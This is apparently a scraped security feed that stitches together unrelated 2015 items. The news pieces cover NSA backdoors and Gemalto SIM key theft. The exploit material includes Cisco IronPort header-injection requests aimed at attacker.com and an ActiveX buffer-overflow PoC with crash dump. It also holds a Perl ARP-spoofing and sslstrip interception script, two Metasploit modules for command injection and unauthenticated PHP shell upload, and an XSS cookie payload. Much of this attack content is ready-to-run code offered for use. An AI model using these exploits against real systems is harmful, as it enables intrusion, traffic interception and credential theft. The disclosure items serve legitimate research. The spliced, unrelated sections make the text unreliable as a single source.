Cisco Ironport AsyncOS HTTP Header Injection Vendor: Cisco Product webpage: http://www.cisco.com Affected version(s): Cisco Ironport ESA - AsyncOS 8.0.1-023 Cisco Ironport WSA - AsyncOS 8.5.5-021 Cisco Ironport SMA - AsyncOS 8.4.0-138 Date: 24/02/2015 Credits: Glafkos Charalambous CVE: CVE-2015-0624 Disclosure Timeline: 28-10-2014: Vendor Notification 28-10-2014: Vendor Response/Feedback 22-01-2015: Vendor Fix/Patch 20-02-2015: Vendor Advisory Release 24-02-2015: Public Disclosure Description: Cisco AsyncOS is vulnerable to unauthenticated HTTP Header Injection, caused by improper validation of user supplied input when handling HTTP Host and X-Forwarded-Host request headers. An attacker is able to inject crafted HTTP headers that could cause a web page redirection to a malicious website. PoC #1 GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 DNT: 1 Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd Connection: keep-alive Content-Length: 0 Host: ironport:8443:@[attacker.com] PoC #2 GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 DNT: 1 Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd Connection: keep-alive Content-Length: 0 Host: [attacker.com] PoC #3 GET https://ironport:8443/monitor/wsa_user_report HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 DNT: 1 Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd Connection: keep-alive Host: ironport:8443 X-Forwarded-Host: [attacker.com] References: http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2015-0624 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (MingW32) mQENBFE6TCMBCADQKVLT3xkJDQpUE6M3akJdFRWgFEy2pwoDbnOGDhw6yQYObDEuUlixRV5u xaIwzh9xPSS36B72bhQC3isHuqDu3xVhx9OX7XlLheXDZJdRbNIXQ3YPk1uYQizuoIpHq08x Eq4V2CXq7ovZPhWI6+iJt6QkVYvZXJdyoTKT8bLaFSOEfLeyAgkCQdXOgnzmNWeedxp0xGAj KL7qIhLETp/MK46ndo5hF8RIbVs59gWdu4GxXr96qViJLiAYO1dQNLc+LShMnue91neTjLoe JkpgqLfEGKV459eCJNqxlylIVbxyTmigExftZKAdNFHat0txK0fB/bLOwRnNFqYWQxanABEB AAG0KEdsYWZrb3MgQ2hhcmFsYW1ib3VzIDxnbGFma29zQGdtYWlsLmNvbT6JATgEEwECACIF AlE6TCMCGw8GCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEHAhLSD814yOAcoIALO6d2AQ M0l9KD9hPIody4VYOgY8stBrumI+t8njzJOYCCLdzB781vCAa0vINPFuFxGp2e8EfMfvf8+Z S6kC8EOQ6XyC8eq6imc1Q+tFMwTgykJZPFdosfXjBwg9jos/CR4dI6RZuzGC/FdXjpTAypbE n3m2a+DBb6CUPeB9nVQq6ukRGbuZ8S+veWRNFwKkTSwC0HKtf9Od+JBrLKesNa3LWLo8q7+d V3VS8rf8cmOOGBuaITzj87iRpgAgkF3MATa1Vb2nbbdYMpvHbzoj62mSqRiyEp1SOY9XkgcL 2ORsjgjww7GpH3F8LFvaHSHVz+037+E/+i/OSTS7o6gY4eI= =yiro -----END PGP SIGNATURE----- Source

Webgate technology is focused on digital image processing, embedded system design and networking to produce embedded O/S and web server cameras providing real time images. We are also making superior network stand-alone DVRs by applying our accumulated network and video solution knowledge. WEBGATE Embedded Standard Protocol (WESP) SDK supports same tools in both network DVR and network camera. Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax Technology, Fujitsu AOS Technology, inc http://www.webgateinc.com/wgi/eng/#2 http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.html Vulnerability 1: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImage Buffer Overflow Vulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePassword Buffer Overflow Vulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImageEx Buffer Overflow Vulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveX Connect Buffer Overflow Vulnerabilit 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer Overflow Vulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX Connect Buffer Overflow Vulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX ConnectEx3 Buffer Overflow CompanyName WebgateInc FileDescription WESPConfig Module FileVersion 1, 6, 42, 0 InternalName WESPConfig LegalCopyright Copyright (C) 2004-2010 OriginalFileName WESPConfig.DLL ProductName WESPConfig Module ProductVersion 1, 6, 42, 0 ******************PoC for one of the above Vulnerabilities*********** <html> <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'> </object> <!-- targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll" prototype = "Sub ConnectEx3 ( ByVal bDvrs As Integer , ByVal Address As String , ByVal Port As Integer , ByVal UserID As String , ByVal Password As String , ByVal extcompany As Long , ByVal authType As Long , ByVal AdditionalCode As String )" memberName = "ConnectEx3" progid = "WESPPLAYBACKLib.WESPPlaybackCtrl" argCount = 8 --> <script language='vbscript'> arg1=1 arg2=String(1044, "A") arg3=1 arg4="defaultV" arg5="defaultV" arg6=1 arg7=1 arg8="defaultV" target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8 </script> </html> ****************************** Stack trace for above PoC Exception Code: ACCESS_VIOLATION Disasm: 76ACD33D MOV CX,[EAX] Seh Chain: -------------------------------------------------- 1 41414141 Called From Returns To -------------------------------------------------- msvcrt.76ACD33D WESPPlayback.999539 WESPPlayback.999539 41414141 41414141 22E5E0 22E5E0 2F712C 2F712C 41414141 41414141 41414141 41414141 41414141 41414141 41414141 Registers: -------------------------------------------------- EIP 76ACD33D EAX 41414141 EBX 039E0040 -> 009DF298 ECX E0551782 EDX 41414141 EDI 76AD4137 -> 8B55FF8B ESI 76ACD335 -> 8B55FF8B EBP 0022E56C -> 039E0020 ESP 0022E56C -> 039E0020 Block Disassembly: -------------------------------------------------- 76ACD333 NOP 76ACD334 NOP 76ACD335 MOV EDI,EDI 76ACD337 PUSH EBP 76ACD338 MOV EBP,ESP 76ACD33A MOV EAX,[EBP+8] 76ACD33D MOV CX,[EAX] <--- CRASH 76ACD340 INC EAX 76ACD341 INC EAX 76ACD342 TEST CX,CX 76ACD345 JNZ SHORT 76ACD33D 76ACD347 SUB EAX,[EBP+8] 76ACD34A SAR EAX,1 76ACD34C DEC EAX 76ACD34D POP EBP ArgDump: -------------------------------------------------- EBP+8 41414141 EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA EBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EBP+20 00000829 EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Stack Dump: -------------------------------------------------- 22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00 [................] 22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00 [.q.......q......] 22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00 [.o..............] 22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00 [................] 22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................] P.S. CERT tried to coordinate with the vendor for fixing the issues but there wasn't any response from vendor Best Regards, Praveen Darshanam Source

Echoing the concerns many US-based technology companies have about US-led surveillance programs, Yahoo Chief Information Security Officer Alex Stamos asked the director of the National Security Agency some pointed questions concerning proposed or existing backdoors placed in encryption technologies. The responses from NSA Director Adm. Mike Rogers only underscored the growing divide. The frank exchange occurred Monday at the Cybersecurity for a New America conference in Washington DC. It came 17 months after materials leaked by former NSA subcontractor Edward Snowden documented NSA-engineered backdoors were built into widely used cryptography technologies so that government agents could decrypt communications. Critics have since warned that the policy could backfire on US citizens, since backdoors can be exploited by governments of a variety of countries. Rogers clearly disagreed, but his denials were notable for a lack of technical detail. What follows is an excerpt of the exchange, as first provided by website Just Security: Source

#!usr/bin/perl use Term::ANSIColor; ############################################################################ print "**************************************************************\n"; # print "+ -== JULI ==- +\n"; # print "+ -== Man-in-the-middle Attack Script ==- +\n"; # print "+ -== By em616 , em(at)em616.com , http://blog.em616.com ==- +\n"; # print "**************************************************************\n"; # ############################################################################ # Cleaning stuff system "killall -9 sslstrip arpspoof:"; system "echo '0' > /proc/sys/net/ipv4/ip_forward"; system "iptables --table nat --flush"; system "iptables --flush"; system "iptables --delete-chain"; system "iptables --table nat --delete-chain"; #Making a Firewall, setting iptables roule to redirect port 80 to 5254 print color("bold red"), "Setting up the iptables roulle\n", color("reset"); print color("bold red"), ". . ..\n", color("reset"); system "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 5254"; #Port Fawarding print color("bold red"), "Setting up port fawarding on our box\n", color("reset"); system "echo '1' > /proc/sys/net/ipv4/ip_forward"; ## Arpspoof Script, must specify your interface and router IP if ($#ARGV < 0) { print q{ Enter your interface and router ip, Ex: en@em616:~$ perl juli.pl wlan0 192.168.0.1 }; exit; } elsif ($#ARGV < 1) { print "You have not provided all of the arguments required\n"; print color("bold green"), "perl juli.pl wlan0 192.168.0.1\n", color("reset"); exit; } $interface = $ARGV[0]; $getway = $ARGV[1]; print color("bold red"), "Starting arpsoof on interface: $interface ip: $getway \n", color("reset"); system "arpspoof -i $interface $getway & sslstrip -a -k -l 5254 -w Juliscript.log"; print "Script stoped by you , check Juliscript.log if we found anything \n" # LineAL Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'HP Client Automation Command Injection', 'Description' => %q{ This module exploits a command injection vulnerability on HP Client Automation, distributed actually as Persistent Systems Client Automation. The vulnerability exists in the Notify Daemon (radexecd.exe), which doesn't authenticate execution requests by default neither. This module has been tested successfully on HP Client Automation 9.00 over Windows 2003 SP2 and CentOS 5. }, 'Author' => [ 'Ben Turner', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ ['CVE', '2015-1497'], ['ZDI', '15-038'], ['URL', 'https://radiasupport.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features'] ], 'Privileged' => true, 'Platform' => %w{ unix win }, 'DefaultOptions' => { 'WfsDelay' => 10 }, 'Payload' => {'DisableNops' => true}, 'Targets' => [ [ 'HP Client Automation 9.0.0 / Linux', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 466, 'EncoderType' => Msf::Encoder::Type::CmdUnixPerl, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl telnet generic gawk' }, 'BadChars' => "\x27" } } ], [ 'HP Client Automation 9.0.0 / Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 02 2014')) register_options( [ Opt::RPORT(3465) ], self.class) deregister_options('CMDSTAGER::FLAVOR') deregister_options('CMDSTAGER::DECODER') end def check connect sock.put("\x00") # port sock.put("#{rand_text_alphanumeric(4 + rand(3))}\x00") # user ID sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password sock.put("hide\x00") # command res = sock.get_once disconnect if res && res.unpack('C')[0] == 0 return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def exploit case target['Platform'] when 'win' print_status('Exploiting Windows target...') execute_cmdstager({:flavor => :vbs, :linemax => 290}) when 'unix' print_status('Exploiting Linux target...') exploit_unix else fail_with(Failure::NoTarget, 'Invalid target') end end def exploit_unix connect sock.put("\x00") # port sock.put("0\x00") # user ID sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password sock.put("hide hide\x09sh -c '#{payload.encoded.gsub(/\\/, "\\\\\\\\")}'\x00") # command, here commands can be injected disconnect end def execute_command(cmd, opts = {}) connect sock.put("\x00") # port sock.put("S-1-5-18\x00") # user ID sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password sock.put("hide hide\"\x09\"cmd.exe /c #{cmd}&\"\x00") # command, here commands can be injected res = sock.get_once disconnect unless res && res.unpack('C')[0] == 0 fail_with(Failure::Unknown, "Something failed executing the stager...") end end end Source

## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'socket' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::HTTP::Wordpress def initialize(info = {}) super(update_info( info, 'Name' => 'WordPress Holding Pattern Theme Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in all versions of the Holding Pattern theme found in the upload_file.php script which contains no session or file validation. It allows unauthenticated users to upload files of any type and subsequently execute PHP scripts in the context of the web server. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alexander Borg', # Vulnerability disclosure 'Rob Carr <rob[at]rastating.com>' # Metasploit module ], 'References' => [ ['CVE', '2015-1172'], ['WPVDB', '7784'], ['URL', 'http://packetstormsecurity.com/files/130282/WordPress-Holding-Pattern-0.6-Shell-Upload.html'] ], 'DisclosureDate' => 'Feb 11 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['holding_pattern', {}]], 'DefaultTarget' => 0 )) end def rhost datastore['RHOST'] end def holding_pattern_uploads_url normalize_uri(wordpress_url_themes, 'holding_pattern', 'uploads/') end def holding_pattern_uploader_url normalize_uri(wordpress_url_themes, 'holding_pattern', 'admin', 'upload-file.php') end def generate_mime_message(payload, payload_name) data = Rex::MIME::Message.new target_ip = IPSocket.getaddress(rhost) field_name = Rex::Text.md5(target_ip) data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"") data end def exploit print_status("#{peer} - Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha(10)}.php" data = generate_mime_message(payload, payload_name) print_status("#{peer} - Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => holding_pattern_uploader_url, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s ) fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 payload_url = normalize_uri(holding_pattern_uploads_url, payload_name) print_status("#{peer} - Executing the payload at #{payload_url}") register_files_for_cleanup(payload_name) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end end Source

===================================================== Stored XSS Vulnerability in ADPlugg Wordpress Plugin ===================================================== . contents:: Table Of Content Overview ======== * Title :Stored XSS Vulnerability in ADPlugg Wordpress Plugin * Author: Kaustubh G. Padwad * Plugin Homepage: https://wordpress.org/plugins/adplugg/ * Severity: Medium * Version Affected: 1.1.33 and mostly prior to it * Version Tested : 1.1.33 * version patched: 1.1.34 Description =========== Vulnerable Parameter -------------------- * Access Code About Vulnerability ------------------- This plugin is vulnerable to a Stored cross site scripting vulnerability,This issue was exploited when administrator users with access to AdPlugg Setting in wordpress Access code parameter is vulnerable for stored XSS. A malicious administration can hijack other users session, take control of another administrator's browser or install malware on their computer. Vulnerability Class =================== Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= After installing the plugin * Goto settings --> AdPlugg * Put This payload in Access Code "><script>alert(document.cookie)</script> * Click on the Save Changes you will see XSS in action * Reload the page or re navigate to page to make sure its stored Mitigation ========== Update to Version 1.1.34 Change Log ========== https://wordpress.org/plugins/adplugg/changelog/ Disclosure ========== 18-February-2015 reported to developer 19-February-2015 Developer acknodlage the Bug 19-February-2015 Developer Patched the Bug and Push update 21-February-2015 Public Discloser credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh@me.com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad Source

Windows Object Explorer 64-bit (WinObjEx64) WinObjEx64 is an advanced utility that lets you explore the Windows Object Manager namespace. For certain object types, you can double-click on it or use the "Properties..." toolbar button to get more information, such as description, attributes, resource usage etc. WinObjEx64 let you view and edit object-related security information if you have required access rights. System Requirements WinObjEx64 does not require administrative privileges. However administrative privilege is required to view much of the namespace and to edit object-related security information. WinObjEx64 works only on the following x64 Windows: Windows 7, Windows 8, Windows 8.1 and Windows 10, including Server variants. WinObjEx64 does not work on Windows XP, Windows Vista is partially supported. We have no plans of their full support. In order to use all program features Windows must be booted in the DEBUG mode. Build WinObjEx64 comes with full source code. In order to build from source you need Microsoft Visual Studio 2013 U4 and later versions. Authors © 2015 WinObjEx64 Project Original WinObjEx © 2003 - 2005 Four-F Acknowledgements We would like to thanks the following people for their contributions (in the alphabetical order): Andrew Ivlev aka Four-F - author of the original x86-32 WinObjEx Giuseppe Bonfa aka Evilcry - KDSubmarine author Mark Russinovich - author of the original proof-of-concept tool WinObj Microsoft WinDBG developers team Source and compiled binary here https://github.com/hfiref0x/WinObjEx64 Project files SHA1: https://github.com/hfiref0x/WinObjEx64/blob/master/Source/SHA1.hash Copy: 818bf9f0d4189347e9bd157a2810615109423e62 *Release\WinObjEx64.chm 957157318a64482f446b97c82afe786444b1b2ff *Release\WinObjEx64.exe 6f4df146c341d7f2dafbe5e3d1aee5f2c7b3488b *WinObjAdv\aboutDlg.c d0e500c0092000d73fd711a5d20c35b69f4ac447 *WinObjAdv\aboutDlg.h 74fcc74b3d7d7a4467869a888dcd4f67797ca156 *WinObjAdv\excepth.c 2ba8ded754090338b733797accdb696162866e75 *WinObjAdv\excepth.h fbad8de8cbc2eb1ed7612a495ac5e0206210d241 *WinObjAdv\findDlg.c 68449112b665b763729ef78fec2d7e2dd2bca653 *WinObjAdv\findDlg.h 08f9599cc724cda5a8148a09dc31655e1eefe345 *WinObjAdv\global.h 80c6e0253371e8debbf7389ffe954231ad5bf705 *WinObjAdv\instdrv.c 2a943159f01da7516f1a49c5bd1407a69835bbce *WinObjAdv\instdrv.h 0f68ede96ad12ad93f594525b98b3daf25e2383a *WinObjAdv\kldbg.c 1892a89b673214b71d08854f39ee55342ae72c88 *WinObjAdv\kldbg.h 37814686c9a82fdfdc568f2759cea117fc2a9952 *WinObjAdv\list.c f26030f75546ec594fd5a87ee2fc82796480599d *WinObjAdv\list.h 9f98dd38d9b13f7572f59589973d3033d7d34fcb *WinObjAdv\main.c e9cf1468a3ebcb67fcea1b86730a25e6669b096b *WinObjAdv\minirtl.c 500a94a62e9ba78c38833670302537cf6fb0e3d0 *WinObjAdv\minirtl.h ef02d79e830000af6efbd0cb527eaa7a60efa917 *WinObjAdv\ntos.h 4c1698b624baaa52f6b2ff2c536b9df644e52820 *WinObjAdv\obex.manifest 92c7dfb2face6bc570fb63ee123702ebf30764f4 *WinObjAdv\propBasic.c ff406cb1a50504533e367eca67e759f044ddd5ab *WinObjAdv\propBasic.h a00e7fa470faad601bde2219e596c20c2294acd0 *WinObjAdv\propBasicConsts.h 4328cb76fcb70930fe8be27e7c89ad768273224f *WinObjAdv\propDesktop.c cf5e6d7616c776aff3bcf6ec7698fb18bfd76950 *WinObjAdv\propDesktop.h 9364e13a1eb1c2c8062ce1002fcbf7d5dfba344c *WinObjAdv\propDlg.c bdc4258b60a8c512c487cfd6c726caa0ff3b0976 *WinObjAdv\propDlg.h 72cb46536bd855f9ee2b6be32bd097ec48267909 *WinObjAdv\propDriver.c d4bf75d244002db8da4cd5314ea757896bbcbd3e *WinObjAdv\propDriver.h b72b9ee8ccfbbd78844548e40d6bebf42d497a67 *WinObjAdv\propDriverConsts.h a82596fc8914f384049c68469eb45c0468866c44 *WinObjAdv\propObjectDump.c df95b45770b80b5e88fd5cfea593eb51790222a2 *WinObjAdv\propObjectDump.h f4de0f1071031d2ae108a683ca9deb5066a9f3a3 *WinObjAdv\propObjectDumpConsts.h 1e3d3e0747dd2bf464f9351018309e78fe02870e *WinObjAdv\propProcess.c 4a050a42f7bf083fafe23f0fe94bf34d45287559 *WinObjAdv\propProcess.h 0325abb4e9bf8867eea50fdb7f508b010d702d70 *WinObjAdv\propSecurity.c ac8356ce68b06cbd917bd54ed463d3ea15f06856 *WinObjAdv\propSecurity.h aefd3c0d9ea1a5506cafa3425fbb6128aab132d4 *WinObjAdv\propSecurityConsts.h 7513279bf1104150e0a1608176b899f2b5073fa3 *WinObjAdv\propType.c b01ee5835191e2e2e47106630f5f42fcab789b92 *WinObjAdv\propType.h 565a332243f0beb23970bf4e0180c9607bd7a246 *WinObjAdv\propTypeConsts.h 21028096ddc34328c1c098ca3de2de59aa6e9075 *WinObjAdv\resource.h 4d063a98918873efcc86682d31c18aeb821e2367 *WinObjAdv\Resource.rc f2c93d88f1a5dbfa8cafa1c31e02c866dc975371 *WinObjAdv\rsrc\100.ico 69a5a4ed71a85e99b4806563a2739d7de5dc2e38 *WinObjAdv\rsrc\101.ico fd979dd62fdbeba6298ac1dabbc678fe0dbb0ae5 *WinObjAdv\rsrc\102.ico c16779a0fef28aab679eda6c18e7c6f5e68a5c20 *WinObjAdv\rsrc\103.ico bcd4d1222ebdcf1545209451c5247cb61549ec23 *WinObjAdv\rsrc\104.ico a0b22a0e9ab1401926aef939df99acc1a7a7d9ad *WinObjAdv\rsrc\105.ico e94d7aad576eccad0d8d8c52249700230dab76c8 *WinObjAdv\rsrc\106.ico 824001cd7bae24b7217b075d32da7618c93bdd00 *WinObjAdv\rsrc\107.ico c5c1a26d3e2bab8086d663ce2326f476e73f0f08 *WinObjAdv\rsrc\108.ico 65f8d9d565b00930920fbff580c87d399b90f9cc *WinObjAdv\rsrc\109.ico 56c27e823eb044da4d7726f0d35d98822bd79344 *WinObjAdv\rsrc\110.ico 08b8573a1efd1803099698a011f3c3d6eb00d3da *WinObjAdv\rsrc\111.ico f9ea074c8c152d30af74f4b266ab80aaf10a2821 *WinObjAdv\rsrc\112.ico 13e524fbc7b803ab711e11fb61f1014641cff8b6 *WinObjAdv\rsrc\113.ico 69a5a4ed71a85e99b4806563a2739d7de5dc2e38 *WinObjAdv\rsrc\114.ico 3a9b58b48fd4dfcb356abfd915036d7195c3c29c *WinObjAdv\rsrc\115.ico 335fd760d495b9a68ccafbcfb52f4f1ddc90b3fc *WinObjAdv\rsrc\116.ico 2d9b7e5622ef1c6f96cf85d344a989df7d129530 *WinObjAdv\rsrc\117.ico aa221c069f9a53f9afa7fbccb4465ce4da6baf58 *WinObjAdv\rsrc\118.ico 530ac9c2d277d9908decb955618ab2b43995cd1f *WinObjAdv\rsrc\119.ico 4ef03bb6bbc10b1723770a03b6fd899d3be1044a *WinObjAdv\rsrc\120.ico d84cd22bab028700050a644be5c2a7dafcc4553a *WinObjAdv\rsrc\121.ico 557be784a62110a81aa0f4b620c210e165857905 *WinObjAdv\rsrc\122.ico 674f4875596c907ee8da940edff1e98401e8b7fa *WinObjAdv\rsrc\123.ico 041a38d1522858aaede0df6d42b2479c8300c988 *WinObjAdv\rsrc\124.ico c0832fe5bf96f11a8133bbed66449574a3fd9089 *WinObjAdv\rsrc\125.ico 0a2aeedde4dc3934e28d727396c1ff93fddf6a6e *WinObjAdv\rsrc\126.ico 56d12ceb51825d502ba3a096396404af56b8f817 *WinObjAdv\rsrc\127.ico b7c0bf31dd02382e151e4d62fc078bc292303ff9 *WinObjAdv\rsrc\128.ico 267f398bd643e7c1591412b2c7538b79e1159ca9 *WinObjAdv\rsrc\129.ico 1be3fd5b055f60b2c2357e9cb87dddad22542a95 *WinObjAdv\rsrc\130.ico 8b725d0d5552061a6cd88e17eda3d580c4fa7fde *WinObjAdv\rsrc\131.ico 9e89e0564daacd2bb36f906e4754d3a3b95141d7 *WinObjAdv\rsrc\132.ico f57a70dbb02c43ffcf8b6d028f775606a2be5d91 *WinObjAdv\rsrc\133.ico 863ce1668eccc967273a8fbaff5e29db81d4d047 *WinObjAdv\rsrc\134.ico d9bb1b62d374b1cfb0892d5e1437342701db2a1f *WinObjAdv\rsrc\135.ico 8c64531a70ad2bf61c050fd1e69a9d7e87549c35 *WinObjAdv\rsrc\136.ico 34356dcf20c4dd0adc3d363d25dcd7ed4e98bfa9 *WinObjAdv\rsrc\137.ico 656ccfe0b2a147b61b16321e14516e0c2dccbd57 *WinObjAdv\rsrc\138.ico 1721fe712b75808604318f015c09f6b2b469baf7 *WinObjAdv\rsrc\6001.ico 68b25362609b6db97c40b375e2497e2db4f5ee48 *WinObjAdv\rsrc\6002.ico 8f4a9ec169d9c6e80ae2a8ee1947dab63665337d *WinObjAdv\rsrc\Bitmap_125.bmp 6f5b29fffb021bf80ca91d6d67cfc019d63f7175 *WinObjAdv\rsrc\kldbgdrv.sys da3fa9f3a72da9bde1d73dd4b5f7d93b909fe3d6 *WinObjAdv\sup.c 38c463dcf6a834eea357bc766135dfa5210ba99c *WinObjAdv\sup.h 09ca1ed7f052113f24bf2f11c877538b772701a3 *WinObjAdv\supConsts.h e87a6e82d41f9b065e58fdc5a2acf362ca6969cb *WinObjAdv\treelist.c 7d5d97dcc923a87d5f6064fe1b9fdba5e04674fe *WinObjAdv\treelist.h a99d9f26e6df31641a6780993b96b76d0e0ce088 *WinObjAdv\ui.h e78a55a5c4a562c54d77b16f24b88c42fd6b3816 *WinObjAdv\WinObjAdv.vcxproj e9ba01dd003e20ab20191dabbebde20921abe3f6 *FILELIST.txt 5eedad7ce5b95dd191d1556072481e18295676fd *README.md 0d66462034a77394dc5272acdb8d13758f448b19 *TODO.txt 16ee9f3cf034a76595910177b911832de6a4081c *WinObjAdv.sln In attach compiled version. SHA1 818bf9f0d4189347e9bd157a2810615109423e62 *WinObjEx64.chm 957157318a64482f446b97c82afe786444b1b2ff *WinObjEx64.exe Copyrights WinObjEx64 developed by WinObjEx64 Project group, in the alphabetical order: EP_X0FF MP_ART This program uses Windows Debugger Local Kernel Debugging Driver © Microsoft Corporation. Please use this thread for bugreports. Also take a note that Windows 10 is supported *AS IS* since it wasn't released yet, official support will be added after official release. Download Source

At last week’s Security Analyst Summit, HackerOne’s Katie Moussouris explains one of the key things that companies that want to start a bounty or vulnerability incentive program should know: There is no one size fits all. Source

Security experts are still trying to assess the effects of the reported attack on SIM card manufacturer that resulted in the theft of millions of encryption keys for mobile phones around the world, but it’s safe to say that the operation has caused reverberations throughout the industry and governments in several countries. The attack, reported by The Intercept, is breathtaking in its scope and audacity. Attackers allegedly associated with the NSA and GCHQ, the British spy agency, were able to compromise a number of machines on the network of Gemalto, a global manufacturer of mobile SIM cards. The attackers have access to servers that hold the encryption keys for untold millions of mobile phones, allowing them to monitor the voice and data communication of those devices. The document on which the report is based was provided by Edward Snowden, and it says in part, “Gemalto–successfully implanted several machines and believe we have their entire network…” If true, that would mean that the attackers had access to far more than just those SIM encryption keys. Gemalto officials said in a statement that they were previously unaware of this operation. “The publication indicates the target was not Gemalto per se – it was an attempt to try and cast the widest net possible to reach as many mobile phones as possible, with the aim to monitor mobile communications without mobile network operators and users consent. We cannot at this early stage verify the findings of the publication and had no prior knowledge that these agencies were conducting this operation,” the statement says. Security researchers have said since the beginning of the NSA scandal–and before that, in some cases–that the agency and its allies have an intense interest in monitoring mobile communications. Mobile networks present different challenges than traditional computer networks do for attackers, but they are not insurmountable ones for organizations with the resources of NSA and GCHQ. Gemalto, as one of the larger SIM manufacturers on earth, would be a natural target for signals intelligence agencies, as it provides products to hundreds of wireless providers, including Verizon, AT&T and Sprint. Bruce Schneier, CTO of CO3 Systems and a noted cryptographer, said that this operation may represent the most serious revelation of the Snowden documents. “People are still trying to figure out exactly what this means, but it seems to mean that the intelligence agencies have access to both voice and data from all phones using those cards,” Schneier said on his blog. “I think this is one of the most important Snowden stories we’ve read.” The Gemalto revelation could have long-term effects for the technology industry and its relations with the government in the United States and UK. The relationships already have been strained by past revelations of NSA operations against infrastructure owned by companies such as Google, Yahoo and many others. This latest revelation likely won’t help matters. But White House officials aren’t worried. “We certainly are aware of how important it is for the United States government to work with private industry; that there are a lot of situations in which our interests are pretty cleanly aligned. And there are certainly steps that the U.S. government has taken in the name of national security that some members of private industry haven’t agreed with. But I do think that there is common ground when it comes to — and this is a principle that I’ve cited before — it’s hard for me to imagine that there are a lot of technology executives that are out there that are in a position of saying that they hope that people who wish harm to this country will be able to use their technology to do so,” Josh Earnest, White House press secretary, said during a briefing on Friday. Source

